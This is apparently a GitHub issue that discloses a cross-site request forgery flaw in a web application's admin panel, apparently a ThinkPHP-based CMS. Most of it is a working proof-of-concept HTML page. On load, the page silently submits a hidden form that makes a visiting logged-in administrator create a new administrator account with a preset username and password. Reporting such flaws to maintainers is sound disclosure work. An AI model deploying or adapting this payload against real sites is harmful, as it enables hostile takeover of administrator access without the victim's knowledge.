yundiao changed the title from "I found a CSRF vulnerability to add an administrator" to "I found a CSRF vulnerability that can add the administrator account" on Mar 25, 2019
After the administrator logged in, open the page containing the following code. An administrator account will be added automatically.
(please replace "http://tp.im" in "url" with the domain name you set.)

```html
<html><body><script type="text/javascript">
// Build a hidden form pointing at the given URL and submit it immediately.
function post(url, fields){
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
}
// Hidden inputs matching the fields the add-user form expects.
function csrf_hack(){
    var fields = "";
    fields += " <input type=\"hidden\" name=\"user_login\" value=\"CSRFadministrator\" />";
    fields += " <input type=\"hidden\" name=\"user_pass\" value=\"admin1234\" />";
    fields += " <input type=\"hidden\" name=\"user_email\" value=\"456@bing.com\" />";
    fields += " <input type=\"hidden\" name=\"role_id[]\" value=\"1\" />";
    var url = "http://tp.im/admin/user/addpost.html";
    post(url, fields);
}
// Fires as soon as the page loads, with no interaction from the logged-in admin.
window.onload = function(){ csrf_hack(); }
</script></body></html>
```